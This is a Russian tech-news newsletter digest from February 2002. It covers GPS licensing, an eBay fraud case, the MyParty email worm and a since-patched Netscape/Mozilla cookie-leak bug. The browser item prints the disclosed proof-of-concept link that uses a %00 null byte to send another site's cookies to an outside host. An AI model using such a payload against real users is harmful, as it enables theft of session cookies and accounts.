| ← Февраль 2002 → | ||||||
|
2
|
3
|
|||||
|---|---|---|---|---|---|---|
|
4
|
5
|
6
|
7
|
9
|
10
|
|
|
11
|
12
|
13
|
14
|
15
|
17
|
|
|
18
|
19
|
20
|
21
|
22
|
23
|
24
|
|
25
|
26
|
27
|
28
|
|||
За последние 60 дней ни разу не выходила
Сайт рассылки:
http://www.dir.ru/
Открыта:
01-12-1999
Статистика
0 за неделю
DIR-обзоры Николая Попкова #117 01/02/2002
DIR-обзор
Николая Попкова #117
|
Новости и обзоры: |
http://dz.yandex.ru/dz/article/show_one.php?id=-0001031&category_id=3&theme_id=3 Вам запрещено знать, где вы находитесь Если точность этого знания превышает
плюс-минус 30 метров. Во-первых, продавец обязан сертифицировать продаваемый прибор. Во-вторых, сертифицирует он этот прибор только если прибор не умеет определять координаты точнее, чем с тридцатиметровой ошибкой - для этого, отметим, прибор нужно несколько испортить, потому как стандартный GPS уже давно сей барьер миновал - и, кстати, среднему американцу и европейцу вовсе не запрещено им при такой точности пользоваться. Да - ну и в третьих вы должны получить разрешение на использование навигационной системы. Утверждается, что магазины берутся оное разрешение добывать за пару недель. |
http://www.compulenta.ru/news/2002/1/25/24762/ 50 человек объединились в борьбе против мошенника, обманувшего их на онлайн-аукционе eBay. Как утверждают обманутые покупатели, некий житель штата Аризона предлагал ноутбуки по невысоким ценам на сайте eBay. После того, как продавец получал чеки в качестве оплаты за компьютер, он обналичивал их, но ноутбуков так никто и не получил. Известно, что таким образом интернет-мошенник обманул более 50 человек, получив незаконно более 125 тысяч долларов. Расследование привело к тому, что группе стал известен пароль электронной почты, номер кредитной карты, 4-х значный проверочный код, пароль к учетной записи в службе PayPal. С такими данными, по сути, обманутые клиенты могли вернуть свои деньги самостоятельно, сняв их с кредитной карты. В результате, когда полиция и администрация eBay таки согласились начать расследование, обманутые покупатели предоставили им практически всю информацию, которую только можно собрать о частном лице. Группа обманутых клиентов, таким образом, показала, как можно собрать практически всю информацию о человеке с помощью интернета, как можно защищать свои права в случае игнорирования нарушений закона властями. Однако, данная история имеет немного иной конец. Главным обвинением покупателей было обналичивание их чеков и неотправка товаров. Недавно практически все обманутые клиенты получили свои чеки обратно по почте, в том виде, в котором они и были отправлены. |
Червь MyParty не трогает русских (русскоязычных) http://www.netoscope.ru/news/2002/01/29/4660.html Почтовые черви в массе своей используют один и тот же механизм распространения. Различаются они лишь методами маскировки. В условиях возрастания осмотрительности и подозрительности пользователей становится все труднее заставить ткнуть их на вложенный в письмо файл с телом червя. Его маскируют под картинки, документы, звуковые или видеофайлы. Автор MyParty догадался использовать сходство доменной зоны .com с точно таким же по написанию расширением выполняемых файлов. Он назвал вложенный com-файл с червем "www.myparty.yahoo.com", имитируя, таким образом, адрес веб-сайта. Для завлечения в самом письме говорится, что на указанной страничке размещены фотографии с некоей "ошеломляющей" вечеринки. Интересным обстоятельством является его гуманное отношение к русскоязычным пользователям. Перед активизацией процессов размножения, MyParty проверяет наличие в системе поддержки русского языка (кириллицы). В случае обнаружения таковой червь самоуничтожается. |
Программирование и компьютерыhttp://www.netoscope.ru/news/2002/01/30/4669.html Netscape и Mozilla отдают cookies на сторону В браузере Netscape Communicator обнаружена дыра, позволяющая злоумышленнику получить доступ к пользовательским cookies. Уязвимое место, обнаруженное в Netscape, начиная с версии 6.0 и выше, аналогично дыре в браузере Mozilla версии 0.9.6 и более ранних, на движке которого создан последний Netscape. И Netscape и Mozilla уже выпустили обновленные версии браузеров (Netscape 6.2.1 и Mozilla 0.9.7), в которых уязвимость устранена. Сообщение об обнаружении уязвимого места помещено на сайте ZNep.com. Марк Слемко пишет в своем отчете, что для получения доступа к чужим cookies достаточно разместить на веб-странице или в электронном html-сообщении гиперссылку определенного вида. В результате оба браузера отсылают по указанному адресу cookies, предназначенные для совсем другого (любого другого) сайта. В нормальной ситуации информация, сохраняемая в cookies, может быть прочитана только тем сервером, который ее записывал (или теми, в которых сервер кооперирован, то есть, находится в одном домене). Параметры браузера можно выставить таким образом, что cookies будет "отдаваться" только через безопасное SSL-соединение. Однако обнаруженный Марком Слемко баг позволяет любому получать чужие cookies в обход всех этих защитный механизмов. Баг был онаружен еще 15 ноября прошлого года. Тогда же Слемко отослал сообщение об обнаруженной дыре в Netscape и, после долгих поисков почтового адреса, разработчикам браузера Mozilla. И только после того, как необходимые патчи и апгрейды были разработаны, Марк Слемко опубликовал информацию о дыре. Собственно, сама дыра, по выражению самого Слемко, тривиальна: достаточно разместить на странице или в e-mail ссылку вида: http://alive.znep.com%00www.passport.com/cgi-bin/cookies. В результате клика по ссылке дырявые браузеры отошлют на сервер, адрес которого указан до %00, cookies предназначенные для сервера, адрес которого расположен после %00. Несмотря на тривиальность исполнения, это нарушение безопасного соединения может привести к самым различным последствиям. Все зависит от того, какая информация о пользователе хранится на севере, доступ к cookies которого получен злоумышленником. Аналогичные баги были не так давно обнаружены и в Internet Explorer. Скачать обновленную, залатанную версию барузеров можно на сайтах Netscape.com (здесь) и Mozilla.org.
http://www.netoscope.ru/news/2001/11/12/4036.html Как оказалось, если веб-сайт сконфигурировать определенным образом и поместить на нем некий определенный url, то оператору сайта станет доступна любая информация, хранящаяся в файлах cookies пользователя. Стандартно cookies, записанные на машине пользователя одним сайтом, предоставляются для считывания только этому, внесшему запись, сайту. Однако, благодаря новой дыре у злоумышленника появилась возможность считывать информацию не только из своих, но и из чужих cookies.
http://www.dir.ru/internet/software/ - программы для интернета и не только |
Если Вам понравился этот
обзор Вы можете его переслать друзьям
- пусть им тоже понравится.
Николай
Попков
Добавить
анекдот http://www.guestbook.ru/book.cgi?user=ANEKDOT&action=sign |
| http://subscribe.ru/
E-mail: ask@subscribe.ru |
Отписаться
Убрать рекламу |
| В избранное | ||
